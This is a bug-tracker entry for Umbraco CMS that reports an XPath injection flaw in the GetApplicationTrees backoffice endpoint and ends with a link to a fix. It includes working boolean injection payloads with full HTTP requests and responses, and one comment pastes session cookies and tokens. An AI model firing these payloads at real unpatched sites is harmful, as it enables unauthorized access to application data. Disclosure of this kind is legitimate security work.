U4-9237 - XPath Injection affects GetApplicationTrees

Created by Daniel Wood 01 Dec 2016, 21:31:40 Updated by Sebastiaan Janssen 26 Aug 2018, 16:07:16

Tags: PR

Umbraco version 7.3.4 assembly: 1.0.5820.25371

XPath Injection affects GetApplicationTrees

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic. The payloads 25179032' or '* and 25179032' or '5191'='5192 were each submitted in the application parameter. These two requests resulted in different responses, indicating that the input is being incorporated into an XPath query in an unsafe way.

Affected Host(s):
https://example.com:8010/umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees

Request 1 GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?application=content25179032'%20or%20'*&tree=&isDialog=false HTTP/1.1 Host: example.com:8010 Connection: Keep-Alive Accept: application/json, text/plain, / X-XSRF-TOKEN: 1kfn1y5vXf4Twf3oTmlSQ_A-qVAD_w85-sVxBHxg0_XvhylNK-lijsykeUkS8EetiFxljFYUj1WoQckn-uJLBRJgxoxe89eKVlWXrN09k7SNQuQOfd92hp7s2BvZuYouze6_XuVaCq0SE-0g6lBXVw2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Referer: https://example.com:8010/umbraco/ …[SNIP]…

Response 1 …[SNIP]… Date: Mon, 02 May 2016 19:55:19 GMT Content-Length: 371 Age: 0 Via: HTTPS/1.1 localhost.localdomain

)]}', {"isContainer":true,"children":[],"parentId":null,"hasChildren":false,"nodeType":null,"routePath":null,"childNodesUrl":,"menuUrl":,"iconIsClass":true,"iconFilePath":"","cssClasses":[],"name":"Concierge","id":"-1","icon":"icon-folder-close","trashed":false,"key":"00000000-0000-0000-0000-000000000000","alias":null,"path":null,"metaData":{"containsTrees":false}}

Request 2 GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?application=content25179032'%20or%20'5191'%3d'5192&tree=&isDialog=false HTTP/1.1 Host: example.com:8010 Connection: Keep-Alive Accept: application/json, text/plain, / …[SNIP]…

Response 2 …[SNIP]… Date: Mon, 02 May 2016 19:55:09 GMT Content-Length: 396 Age: 0 Via: HTTPS/1.1 localhost.localdomain

)]}', {"isContainer":true,"children":[],"parentId":null,"hasChildren":false,"nodeType":null,"routePath":null,"childNodesUrl":,"menuUrl":,"iconIsClass":true,"iconFilePath":"","cssClasses":[],"name":"[content25179032' or '5191'='5192]","id":"-1","icon":"icon-folder-close","trashed":false,"key":"00000000-0000-0000-0000-000000000000","alias":null,"path":null,"metaData":{"containsTrees":false}}

Comments

Ben Palmer 26 Oct 2017, 08:59:07

Hi,

We've just had a PEN test on a site that has raised the same issue (details below). As a potential security issue it feels like this one should be higher up the list (our testers raised this as a high risk issue).


The web application was vulnerable to XPath injection. In Xpath injection, an attacker sends XML data to an application or website, and this data is incorporated into XPath queries without being validated. The result is that an experienced attacker could gain access to sensitive data, alter the application’s behaviour, and possible gain elevated privileges. On order to exploit this issue, the payload was injected into the application parameter of the following request:

GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?isDialog=false&application=media12323458'+or '1'='1&tree= HTTP/1.1 Accept-Encoding: gzip, deflate Host: HOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Cookie: ARRAffinity=b3a27f2aa0a6da0b21f2bc98dcf67247321588d733728583022eac19e92176d4; _ga=GA1.3.730234357.1508835368; _gid=GA1.3.1614089538.1508835368; _bizo_bzid=943cae93-777a-418a-8863-5bc8a798ff5b; _bizo_cksm=20BCF1606209B74F; _bizo_np_stats=155%3D2008%2C; XSRF-TOKEN=I9939iv_TE7M_2DMXe9DDYhEflRXegRs8rDbKD4uMvE8tRyQEhKAxP3xP0QC8Nsl5zyX1aZN13zZVxjEPJLruch0vkB8j11mmpxQrfYQaNt5gnfZ41_RoPlGviLe0vY-ttyCCom3tO8-ejS6S2Wd7Q2; XSRF-V=_RG7WLZhdMZRchoyoTyfJsfDb8u_ipubwCJv-RkDi4ZwVb91K8ueVft_kWIuxoVQBtYsbqCY1d-Uew_jzlu1Lu6Y9Cj2xcszJgbgG-n92VU1; UMB_UCONTEXT=D4E0450723F0E821AC236B7DD4A85BA716906C821713ED8CC9ECD77EC141CD4CD3D1D3A442E8F76A1FC12F338236C40B0F2A570F1187D9C9DAFFAE0E9214CDF5C1C871C0004FC8876C2601780B6D6E5762967B49F23915E17E747D89E2D665DFA8B60F9EF22273920EAB711343717695204D7FC2308E6D3D25CF90D9EDD645AC248CEA4F17629DC3F4064DF4DA2699A084603DB1D9845390B0EAA5DE19DC28AFCF82B354974EF0067426E5E31B536DDFD30DA6D9E93E3DB734861938D2F059562323A65DCA50CE342860C23DE926221594C52E39A88E7F4A03CEC8F0CA17C5A6D59BD2064DC0A1DFF280B375BC44E349205356DC4125AD15FDBC9CFAE84CA26CA38D3632D9D187C4F2128ABD5A70F97E41CE3B127527CF4194C19B1BA91F180B6AD6DC1D3BD246346455EC3D5026245D9B5C96623564FA32A8CEF3BB2C4A9D03F0A5FF262DCFF7E943DF28F312FE28FB0B39AC8F97469D32D69243026AEC3A79A39B6E0890222A8E5D5E9BF64311BABDE42D02FB58AF4BFF457EED00F4EAE3CD717AFFD52F5C0C25F890FD245C5889B61A8160F31DE39DB7C42227AAACB9FEDBBFB8045CC11106F491B889449FD905020D3AB18A1342FBBA2BF3945A65DA7DBFCCB8DFB6C99F54087793FBD8757B758566A5324443E796C371B5C7D38685FD0CF520529CE3C0FFEA5F28BF5608B5637C8E135A5E925EEFC5FBC90077263FCB77D13BC4F7BDFD54068257DD20ADA0F3542B107D6C2237F8296F63555CE76753D25B8FE97480270248CDF5F7367BEDC9622B46D76CBF7B336153D299300289E6A7B814363DDFBBF395ACE82D6BB0D8F2839FBDDB9454FB26FC262D6F64B8AB9DAE; ASP.NET_SessionId=l4quobc3actvsfdy2qduhey1; __RequestVerificationToken=aFvf2pkMVkzwyZKKCFl5gj6saGVp59rZZ-eAaQ8sUQhFhJwEFC2AkLH6v9erFUtnOzXoArOI75aEDNkO9lUMe9nHDThcvklt0v-U3l0EvwM1 Connection: close User-Agent: Recon-ng/v4

The (JSON) body response would be evaluated and return: )]}', {isContainer:true,children:[],parentId:null,hasChildren:false,nodeType:null,routePath:null,childNodesUrl:,menuUrl:,iconIsClass:true,iconFilePath:,cssClasses:[],name:Concierge,id:-1,udi:null,icon:icon-folder-close,trashed:false,key:00000000-0000-0000-0000-000000000000,alias:null,path:null,metaData:{containsTrees:false}} However, when injecting a false statement into the application parameter: GET /umbraco/backoffice/UmbracoTrees/ApplicationTree/GetApplicationTrees?isDialog=false&application=media12323458'+or '1'='2&tree= The body response would be: )]}', {isContainer:true,children:[],parentId:null,hasChildren:false,nodeType:null,routePath:null,childNodesUrl:,menuUrl:,iconIsClass:true,iconFilePath:,cssClasses:[],name:[media12323458' or '1'='2],id:-1,udi:null,icon:icon-folder-close,trashed:false,key:00000000-0000-0000-0000-000000000000,alias:null,path:null,metaData:{containsTrees:false}}


Shannon Deminick 18 Dec 2017, 04:06:11

PR: https://github.com/umbraco/Umbraco-CMS/pull/2315


Priority: Normal

Type: Bug

State: Fixed

Assignee:

Difficulty: Normal

Category: Security

Backwards Compatible: True

Fix Submitted:

Affected versions: 7.3.4

Due in version: 7.13.0

Sprint:

Story Points:

Cycle: